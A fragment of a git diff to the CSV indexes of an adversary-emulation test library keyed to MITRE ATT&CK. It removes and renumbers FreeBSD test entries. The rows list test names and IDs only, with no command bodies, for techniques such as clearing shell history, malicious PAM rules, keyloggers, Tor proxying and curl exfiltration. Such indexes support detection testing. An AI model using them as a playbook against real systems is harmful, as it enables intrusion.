-execution,T1059.004,Command and Scripting Interpreter: Bash,16,Detecting pipe-to-shell (freebsd),1a06b1ec-0cca-49db-a222-3ebb6ef25632,sh
-execution,T1059.004,Command and Scripting Interpreter: Bash,17,Current kernel information enumeration,3a53734a-9e26-4f4b-ad15-059e767f5f14,sh
+execution,T1059.004,Command and Scripting Interpreter: Bash,10,Change login shell,c7ac59cb-13cc-4622-81dc-6d2fee9bfac7,bash
+execution,T1059.004,Command and Scripting Interpreter: Bash,11,Environment variable scripts,bdaebd56-368b-4970-a523-f905ff4a8a51,sh
+execution,T1059.004,Command and Scripting Interpreter: Bash,12,Detecting pipe-to-shell,fca246a8-a585-4f28-a2df-6495973976a1,sh
+execution,T1059.004,Command and Scripting Interpreter: Bash,13,Current kernel information enumeration,3a53734a-9e26-4f4b-ad15-059e767f5f14,sh
 execution,T1559,Inter-Process Communication,1,Cobalt Strike Artifact Kit pipe,bd13b9fc-b758-496a-b81a-397462f82c72,command_prompt
 execution,T1559,Inter-Process Communication,2,Cobalt Strike Lateral Movement (psexec_psh) pipe,830c8b6c-7a70-4f40-b975-8bbe74558acd,command_prompt
 execution,T1559,Inter-Process Communication,3,Cobalt Strike SSH (postex_ssh) pipe,d1f72fa0-5bc2-4b4b-bd1e-43b6e8cfb2e6,command_prompt
@@ -1158,11 +1144,10 @@ persistence,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing user t
 persistence,T1078.003,Valid Accounts: Local Accounts,6,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
 persistence,T1078.003,Valid Accounts: Local Accounts,7,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
 persistence,T1078.003,Valid Accounts: Local Accounts,8,Create local account (Linux),02a91c34-8a5b-4bed-87af-501103eb5357,bash
-persistence,T1078.003,Valid Accounts: Local Accounts,9,Create local account (FreeBSD),95158cc9-8f6d-4889-9531-9be3f7f095e0,sh
-persistence,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
-persistence,T1078.003,Valid Accounts: Local Accounts,11,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh
-persistence,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
-persistence,T1078.003,Valid Accounts: Local Accounts,13,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh
+persistence,T1078.003,Valid Accounts: Local Accounts,9,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
+persistence,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh
+persistence,T1078.003,Valid Accounts: Local Accounts,11,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
+persistence,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh
 persistence,T1574.012,Hijack Execution Flow: COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
 persistence,T1574.012,Hijack Execution Flow: COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
 persistence,T1574.012,Hijack Execution Flow: COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
@@ -1190,9 +1175,8 @@ command-and-control,T1572,Protocol Tunneling,3,DNS over HTTPS Long Domain Query,
 command-and-control,T1572,Protocol Tunneling,4,run ngrok,4cdc9fc7-53fb-4894-9f0c-64836943ea60,powershell
 command-and-control,T1090.003,Proxy: Multi-hop Proxy,1,Psiphon,14d55ca0-920e-4b44-8425-37eedd72b173,powershell
 command-and-control,T1090.003,Proxy: Multi-hop Proxy,2,Tor Proxy Usage - Windows,7b9d85e5-c4ce-4434-8060-d3de83595e69,powershell
-command-and-control,T1090.003,Proxy: Multi-hop Proxy,3,Tor Proxy Usage - Debian/Ubuntu,5ff9d047-6e9c-4357-b39b-5cf89d9b59c7,sh
+command-and-control,T1090.003,Proxy: Multi-hop Proxy,3,Tor Proxy Usage - Debian/Ubuntu/FreeBSD,5ff9d047-6e9c-4357-b39b-5cf89d9b59c7,sh
 command-and-control,T1090.003,Proxy: Multi-hop Proxy,4,Tor Proxy Usage - MacOS,12631354-fdbc-4164-92be-402527e748da,sh
-command-and-control,T1090.003,Proxy: Multi-hop Proxy,5,Tor Proxy Usage - FreeBSD,550ec67d-a99e-408b-816a-689271b27d2a,sh
 command-and-control,T1571,Non-Standard Port,1,Testing usage of uncommonly used port with PowerShell,21fe622f-8e53-4b31-ba83-6d333c2583f4,powershell
 command-and-control,T1571,Non-Standard Port,2,Testing usage of uncommonly used port,5db21e1d-dd9c-4a50-b885-b1e748912767,sh
 command-and-control,T1573,Encrypted Channel,1,OpenSSL C2,21caf58e-87ad-440c-a6b8-3ac259964003,powershell
@@ -1263,9 +1247,8 @@ collection,T1123,Audio Capture,1,using device audio capture commandlet,9c3ad250-
 collection,T1123,Audio Capture,2,Registry artefact when application use microphone,7a21cce2-6ada-4f7c-afd9-e1e9c481e44a,command_prompt
 collection,T1123,Audio Capture,3,using Quicktime Player,c7a0bb71-70ce-4a53-b115-881f241b795b,sh
 collection,T1074.001,Data Staged: Local Data Staging,1,Stage data from Discovery.bat,107706a5-6f9f-451a-adae-bab8c667829f,powershell
-collection,T1074.001,Data Staged: Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash
-collection,T1074.001,Data Staged: Local Data Staging,3,Stage data from Discovery.sh (freebsd),4fca7b49-379d-4493-8890-d6297750fa46,sh
-collection,T1074.001,Data Staged: Local Data Staging,4,Zip a Folder with PowerShell for Staging in Temp,a57fbe4b-3440-452a-88a7-943531ac872a,powershell
+collection,T1074.001,Data Staged: Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,sh
+collection,T1074.001,Data Staged: Local Data Staging,3,Zip a Folder with PowerShell for Staging in Temp,a57fbe4b-3440-452a-88a7-943531ac872a,powershell
 collection,T1114.001,Email Collection: Local Email Collection,1,Email Collection with PowerShell Get-Inbox,3f1b5096-0139-4736-9b78-19bcb02bb1cb,powershell
 collection,T1119,Automated Collection,1,Automated Collection Command Prompt,cb379146-53f1-43e0-b884-7ce2c635ff5b,command_prompt
 collection,T1119,Automated Collection,2,Automated Collection PowerShell,634bd9b9-dc83-4229-b19f-7f83ba9ad313,powershell
@@ -1546,12 +1529,11 @@ discovery,T1087.001,Account Discovery: Local Account,2,View sudoers access,fed9b
 discovery,T1087.001,Account Discovery: Local Account,3,View accounts with UID 0,c955a599-3653-4fe5-b631-f11c00eb0397,sh
 discovery,T1087.001,Account Discovery: Local Account,4,List opened files by user,7e46c7a5-0142-45be-a858-1a3ecb4fd3cb,sh
 discovery,T1087.001,Account Discovery: Local Account,5,Show if a user account has ever logged in remotely,0f0b6a29-08c3-44ad-a30b-47fd996b2110,sh
-discovery,T1087.001,Account Discovery: Local Account,6,Show if a user account has ever logged in remotely (freebsd),0f73418f-d680-4383-8a24-87bc97fe4e35,sh
-discovery,T1087.001,Account Discovery: Local Account,7,Enumerate users and groups,e6f36545-dc1e-47f0-9f48-7f730f54a02e,sh
-discovery,T1087.001,Account Discovery: Local Account,8,Enumerate users and groups,319e9f6c-7a9e-432e-8c62-9385c803b6f2,sh
-discovery,T1087.001,Account Discovery: Local Account,9,Enumerate all accounts on Windows (Local),80887bec-5a9b-4efc-a81d-f83eb2eb32ab,command_prompt
-discovery,T1087.001,Account Discovery: Local Account,10,Enumerate all accounts via PowerShell (Local),ae4b6361-b5f8-46cb-a3f9-9cf108ccfe7b,powershell
-discovery,T1087.001,Account Discovery: Local Account,11,Enumerate logged on users via CMD (Local),a138085e-bfe5-46ba-a242-74a6fb884af3,command_prompt
+discovery,T1087.001,Account Discovery: Local Account,6,Enumerate users and groups,e6f36545-dc1e-47f0-9f48-7f730f54a02e,sh
+discovery,T1087.001,Account Discovery: Local Account,7,Enumerate users and groups,319e9f6c-7a9e-432e-8c62-9385c803b6f2,sh
+discovery,T1087.001,Account Discovery: Local Account,8,Enumerate all accounts on Windows (Local),80887bec-5a9b-4efc-a81d-f83eb2eb32ab,command_prompt
+discovery,T1087.001,Account Discovery: Local Account,9,Enumerate all accounts via PowerShell (Local),ae4b6361-b5f8-46cb-a3f9-9cf108ccfe7b,powershell
+discovery,T1087.001,Account Discovery: Local Account,10,Enumerate logged on users via CMD (Local),a138085e-bfe5-46ba-a242-74a6fb884af3,command_prompt
 discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,1,Detect Virtualization Environment (Linux),dfbd1a21-540d-4574-9731-e852bd6fe840,sh
 discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,2,Detect Virtualization Environment (FreeBSD),e129d73b-3e03-4ae9-bf1e-67fc8921e0fd,sh
 discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,3,Detect Virtualization Environment (Windows),502a7dc4-9d6f-4d28-abf2-f0e84692562d,powershell
@@ -1828,11 +1810,10 @@ initial-access,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing use
 initial-access,T1078.003,Valid Accounts: Local Accounts,6,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
 initial-access,T1078.003,Valid Accounts: Local Accounts,7,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
 initial-access,T1078.003,Valid Accounts: Local Accounts,8,Create local account (Linux),02a91c34-8a5b-4bed-87af-501103eb5357,bash
-initial-access,T1078.003,Valid Accounts: Local Accounts,9,Create local account (FreeBSD),95158cc9-8f6d-4889-9531-9be3f7f095e0,sh
-initial-access,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
-initial-access,T1078.003,Valid Accounts: Local Accounts,11,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh
-initial-access,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
-initial-access,T1078.003,Valid Accounts: Local Accounts,13,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh
+initial-access,T1078.003,Valid Accounts: Local Accounts,9,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
+initial-access,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh
+initial-access,T1078.003,Valid Accounts: Local Accounts,11,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
+initial-access,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh
 exfiltration,T1020,Automated Exfiltration,1,IcedID Botnet HTTP PUT,9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0,powershell
 exfiltration,T1048.002,Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol,1,Exfiltrate data HTTPS using curl windows,1cdf2fb0-51b6-4fd8-96af-77020d5f1bf0,command_prompt
 exfiltration,T1048.002,Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol,2,"Exfiltrate data HTTPS using curl freebsd,linux or macos",4a4f31e2-46ea-4c26-ad89-f09ad1d5fe01,bash
diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv
index 9badbe408..4b671347c 100644
--- a/atomics/Indexes/Indexes-CSV/linux-index.csv
+++ b/atomics/Indexes/Indexes-CSV/linux-index.csv
@@ -39,21 +39,14 @@ defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Ma
 defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",19,Overwrite Linux Mail Spool,1602ff76-ed7f-4c94-b550-2f727b4782d4,bash
 defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",20,Overwrite Linux Log,d304b2dc-90b4-4465-a650-16ddd503f7b5,bash
 defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,1,Clear Bash history (rm),a934276e-2be5-4a36-93fd-98adbb5bd4fc,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,2,Clear sh history (rm),448893f8-1d5d-4ae2-9017-7fcd73a7e100,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,3,Clear Bash history (echo),cbf506a5-dd78-43e5-be7e-a46b7c7a0a11,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,4,Clear sh history (echo),a4d63cb3-9ed9-4837-9480-5bf6b09a6c96,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,5,Clear Bash history (cat dev/null),b1251c35-dcd3-4ea1-86da-36d27b54f31f,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,6,Clear sh history (cat dev/null),ecaefd53-6fa4-4781-ba51-d9d6fb94dbdc,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,7,Clear Bash history (ln dev/null),23d348f3-cc5c-4ba9-bd0a-ae09069f0914,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,8,Clear sh history (ln dev/null),3126aa7a-8768-456f-ae05-6ab2d4accfdd,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,9,Clear Bash history (truncate),47966a1d-df4f-4078-af65-db6d9aa20739,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,10,Clear sh history (truncate),e14d9bb0-c853-4503-aa89-739d5c0a5818,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,11,Clear history of a bunch of shells,7e6721df-5f08-4370-9255-f06d8a77af4c,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,12,Clear history of a bunch of shells (freebsd),9bf7c8af-5e12-42ea-bf6b-b0348fb9dfb0,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,13,Clear and Disable Bash History Logging,784e4011-bd1a-4ecd-a63a-8feb278512e6,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,14,Use Space Before Command to Avoid Logging to History,53b03a54-4529-4992-852d-a00b4b7215a6,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,15,Disable Bash History Logging with SSH -T,5f8abd62-f615-43c5-b6be-f780f25790a1,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,16,Disable sh History Logging with SSH -T (freebsd),ec3f2306-dd19-4c4b-bed7-92d20e9b1dee,sh
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,2,Clear Bash history (echo),cbf506a5-dd78-43e5-be7e-a46b7c7a0a11,sh
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,3,Clear Bash history (cat dev/null),b1251c35-dcd3-4ea1-86da-36d27b54f31f,sh
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,4,Clear Bash history (ln dev/null),23d348f3-cc5c-4ba9-bd0a-ae09069f0914,sh
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,5,Clear Bash history (truncate),47966a1d-df4f-4078-af65-db6d9aa20739,sh
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,6,Clear history of a bunch of shells,7e6721df-5f08-4370-9255-f06d8a77af4c,sh
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,7,Clear and Disable Bash History Logging,784e4011-bd1a-4ecd-a63a-8feb278512e6,sh
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,8,Use Space Before Command to Avoid Logging to History,53b03a54-4529-4992-852d-a00b4b7215a6,sh
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,9,Disable Bash History Logging with SSH -T,5f8abd62-f615-43c5-b6be-f780f25790a1,sh
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,3,Base64 decoding with Python,356dc0e8-684f-4428-bb94-9313998ad608,sh
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,4,Base64 decoding with Perl,6604d964-b9f6-4d4b-8ce8-499829a14d0a,sh
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,5,Base64 decoding with shell utilities,b4f6a567-a27a-41e5-b8ef-ac4b4008bb7e,sh
@@ -134,18 +127,16 @@ defense-evasion,T1027.004,Obfuscated Files or Information: Compile After Deliver
 defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,1,Delete a single file - FreeBSD/Linux/macOS,562d737f-2fc6-4b09-8c2a-7f8ff0828480,sh
 defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,2,Delete an entire folder - FreeBSD/Linux/macOS,a415f17e-ce8d-4ce2-a8b4-83b674e7017e,sh
 defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,3,Overwrite and delete a file with shred,039b4b10-2900-404b-b67f-4b6d49aa6499,sh
-defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,8,Delete Filesystem - Linux,f3aa95fe-4f10-4485-ad26-abf22a764c52,bash
-defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,9,Delete Filesystem - FreeBSD,b5aaca7e-a48f-4f1b-8f0f-a27b8f516608,sh
+defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,8,Delete Filesystem - Linux,f3aa95fe-4f10-4485-ad26-abf22a764c52,sh
 defense-evasion,T1027.002,Obfuscated Files or Information: Software Packing,1,Binary simply packed by UPX (linux),11c46cd8-e471-450e-acb8-52a1216ae6a4,sh
 defense-evasion,T1027.002,Obfuscated Files or Information: Software Packing,2,"Binary packed by UPX, with modified headers (linux)",f06197f8-ff46-48c2-a0c6-afc1b50665e1,sh
 defense-evasion,T1036.006,Masquerading: Space after Filename,2,Space After Filename,b95ce2eb-a093-4cd8-938d-5258cef656ea,sh
 defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,1,Create a hidden file in a hidden directory,61a782e5-9a19-40b5-8ba4-69a4b9f3d7be,sh
 defense-evasion,T1078.003,Valid Accounts: Local Accounts,8,Create local account (Linux),02a91c34-8a5b-4bed-87af-501103eb5357,bash
-defense-evasion,T1078.003,Valid Accounts: Local Accounts,9,Create local account (FreeBSD),95158cc9-8f6d-4889-9531-9be3f7f095e0,sh
-defense-evasion,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
-defense-evasion,T1078.003,Valid Accounts: Local Accounts,11,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh
-defense-evasion,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
-defense-evasion,T1078.003,Valid Accounts: Local Accounts,13,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh
+defense-evasion,T1078.003,Valid Accounts: Local Accounts,9,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
+defense-evasion,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh
+defense-evasion,T1078.003,Valid Accounts: Local Accounts,11,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
+defense-evasion,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh
 persistence,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,1,Malicious PAM rule,4b9dde80-ae22-44b1-a82a-644bf009eb9c,sh
 persistence,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,2,Malicious PAM rule (freebsd),b17eacac-282d-4ca8-a240-46602cf863e3,sh
 persistence,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,3,Malicious PAM module,65208808-3125-4a2e-8389-a0a00e9ab326,sh
@@ -187,15 +178,13 @@ persistence,T1543.002,Create or Modify System Process: SysV/Systemd Service,2,Cr
 persistence,T1543.002,Create or Modify System Process: SysV/Systemd Service,3,"Create Systemd Service file, Enable the service , Modify and Reload the service.",c35ac4a8-19de-43af-b9f8-755da7e89c89,bash
 persistence,T1053.002,Scheduled Task/Job: At,2,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
 persistence,T1078.003,Valid Accounts: Local Accounts,8,Create local account (Linux),02a91c34-8a5b-4bed-87af-501103eb5357,bash
-persistence,T1078.003,Valid Accounts: Local Accounts,9,Create local account (FreeBSD),95158cc9-8f6d-4889-9531-9be3f7f095e0,sh
-persistence,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
-persistence,T1078.003,Valid Accounts: Local Accounts,11,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh
-persistence,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
-persistence,T1078.003,Valid Accounts: Local Accounts,13,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh
+persistence,T1078.003,Valid Accounts: Local Accounts,9,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
+persistence,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh
+persistence,T1078.003,Valid Accounts: Local Accounts,11,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
+persistence,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh
 command-and-control,T1132.001,Data Encoding: Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh
 command-and-control,T1132.001,Data Encoding: Standard Encoding,2,Base64 Encoded data (freebsd),2d97c626-7652-449e-a986-b02d9051c298,sh
-command-and-control,T1090.003,Proxy: Multi-hop Proxy,3,Tor Proxy Usage - Debian/Ubuntu,5ff9d047-6e9c-4357-b39b-5cf89d9b59c7,sh
-command-and-control,T1090.003,Proxy: Multi-hop Proxy,5,Tor Proxy Usage - FreeBSD,550ec67d-a99e-408b-816a-689271b27d2a,sh
+command-and-control,T1090.003,Proxy: Multi-hop Proxy,3,Tor Proxy Usage - Debian/Ubuntu/FreeBSD,5ff9d047-6e9c-4357-b39b-5cf89d9b59c7,sh
 command-and-control,T1571,Non-Standard Port,2,Testing usage of uncommonly used port,5db21e1d-dd9c-4a50-b885-b1e748912767,sh
 command-and-control,T1071.001,Application Layer Protocol: Web Protocols,3,Malicious User Agents - Nix,2d7c471a-e887-4b78-b0dc-b0df1f2e0658,sh
 command-and-control,T1105,Ingress Tool Transfer,1,rsync remote file copy (push),0fc6e977-cb12-44f6-b263-2824ba917409,sh
@@ -222,8 +211,7 @@ collection,T1056.001,Input Capture: Keylogging,4,Logging sh history to syslog/me
 collection,T1056.001,Input Capture: Keylogging,5,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,bash
 collection,T1056.001,Input Capture: Keylogging,6,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,sh
 collection,T1056.001,Input Capture: Keylogging,7,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,sh
-collection,T1074.001,Data Staged: Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash
-collection,T1074.001,Data Staged: Local Data Staging,3,Stage data from Discovery.sh (freebsd),4fca7b49-379d-4493-8890-d6297750fa46,sh
+collection,T1074.001,Data Staged: Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,sh
 collection,T1115,Clipboard Data,5,Add or copy content to clipboard with xClip,ee363e53-b083-4230-aff3-f8d955f2d5bb,sh
 collection,T1005,Data from Local System,2,Find and dump sqlite databases (Linux),00cbb875-7ae4-4cf1-b638-e543fd825300,bash
 collection,T1560.002,Archive Collected Data: Archive via Library,1,Compressing data using GZip in Python (FreeBSD/Linux),391f5298-b12d-4636-8482-35d9c17d53a8,sh
@@ -275,11 +263,10 @@ privilege-escalation,T1543.002,Create or Modify System Process: SysV/Systemd Ser
 privilege-escalation,T1543.002,Create or Modify System Process: SysV/Systemd Service,3,"Create Systemd Service file, Enable the service , Modify and Reload the service.",c35ac4a8-19de-43af-b9f8-755da7e89c89,bash
 privilege-escalation,T1053.002,Scheduled Task/Job: At,2,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
 privilege-escalation,T1078.003,Valid Accounts: Local Accounts,8,Create local account (Linux),02a91c34-8a5b-4bed-87af-501103eb5357,bash
-privilege-escalation,T1078.003,Valid Accounts: Local Accounts,9,Create local account (FreeBSD),95158cc9-8f6d-4889-9531-9be3f7f095e0,sh
-privilege-escalation,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
-privilege-escalation,T1078.003,Valid Accounts: Local Accounts,11,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh
-privilege-escalation,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
-privilege-escalation,T1078.003,Valid Accounts: Local Accounts,13,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh
+privilege-escalation,T1078.003,Valid Accounts: Local Accounts,9,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
+privilege-escalation,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh
+privilege-escalation,T1078.003,Valid Accounts: Local Accounts,11,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
+privilege-escalation,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh
 credential-access,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,1,Malicious PAM rule,4b9dde80-ae22-44b1-a82a-644bf009eb9c,sh
 credential-access,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,2,Malicious PAM rule (freebsd),b17eacac-282d-4ca8-a240-46602cf863e3,sh
 credential-access,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,3,Malicious PAM module,65208808-3125-4a2e-8389-a0a00e9ab326,sh
@@ -332,8 +319,7 @@ discovery,T1087.001,Account Discovery: Local Account,2,View sudoers access,fed9b
 discovery,T1087.001,Account Discovery: Local Account,3,View accounts with UID 0,c955a599-3653-4fe5-b631-f11c00eb0397,sh
 discovery,T1087.001,Account Discovery: Local Account,4,List opened files by user,7e46c7a5-0142-45be-a858-1a3ecb4fd3cb,sh
 discovery,T1087.001,Account Discovery: Local Account,5,Show if a user account has ever logged in remotely,0f0b6a29-08c3-44ad-a30b-47fd996b2110,sh
-discovery,T1087.001,Account Discovery: Local Account,6,Show if a user account has ever logged in remotely (freebsd),0f73418f-d680-4383-8a24-87bc97fe4e35,sh
-discovery,T1087.001,Account Discovery: Local Account,7,Enumerate users and groups,e6f36545-dc1e-47f0-9f48-7f730f54a02e,sh
+discovery,T1087.001,Account Discovery: Local Account,6,Enumerate users and groups,e6f36545-dc1e-47f0-9f48-7f730f54a02e,sh
 discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,1,Detect Virtualization Environment (Linux),dfbd1a21-540d-4574-9731-e852bd6fe840,sh
 discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,2,Detect Virtualization Environment (FreeBSD),e129d73b-3e03-4ae9-bf1e-67fc8921e0fd,sh
 discovery,T1069.002,Permission Groups Discovery: Domain Groups,15,Active Directory Domain Search Using LDAP - Linux (Ubuntu)/macOS,d58d749c-4450-4975-a9e9-8b1d562755c2,sh
@@ -399,14 +385,10 @@ execution,T1059.004,Command and Scripting Interpreter: Bash,6,What shell is runn
 execution,T1059.004,Command and Scripting Interpreter: Bash,7,What shells are available,bf23c7dc-1004-4949-8262-4c1d1ef87702,sh
 execution,T1059.004,Command and Scripting Interpreter: Bash,8,Command line scripts,b04ed73c-7d43-4dc8-b563-a2fc595cba1a,sh
 execution,T1059.004,Command and Scripting Interpreter: Bash,9,Obfuscated command line scripts,5bec4cc8-f41e-437b-b417-33ff60acf9af,sh
-execution,T1059.004,Command and Scripting Interpreter: Bash,10,Obfuscated command line scripts (freebsd),5dc1d9dd-f396-4420-b985-32b1c4f79062,sh
-execution,T1059.004,Command and Scripting Interpreter: Bash,11,Change login shell,c7ac59cb-13cc-4622-81dc-6d2fee9bfac7,bash
-execution,T1059.004,Command and Scripting Interpreter: Bash,12,Change login shell (freebsd),33b68b9b-4988-4caf-9600-31b7bf04227c,sh
-execution,T1059.004,Command and Scripting Interpreter: Bash,13,Environment variable scripts,bdaebd56-368b-4970-a523-f905ff4a8a51,bash
-execution,T1059.004,Command and Scripting Interpreter: Bash,14,Environment variable scripts (freebsd),663b205d-2121-48a3-a6f9-8c9d4d87dfee,sh
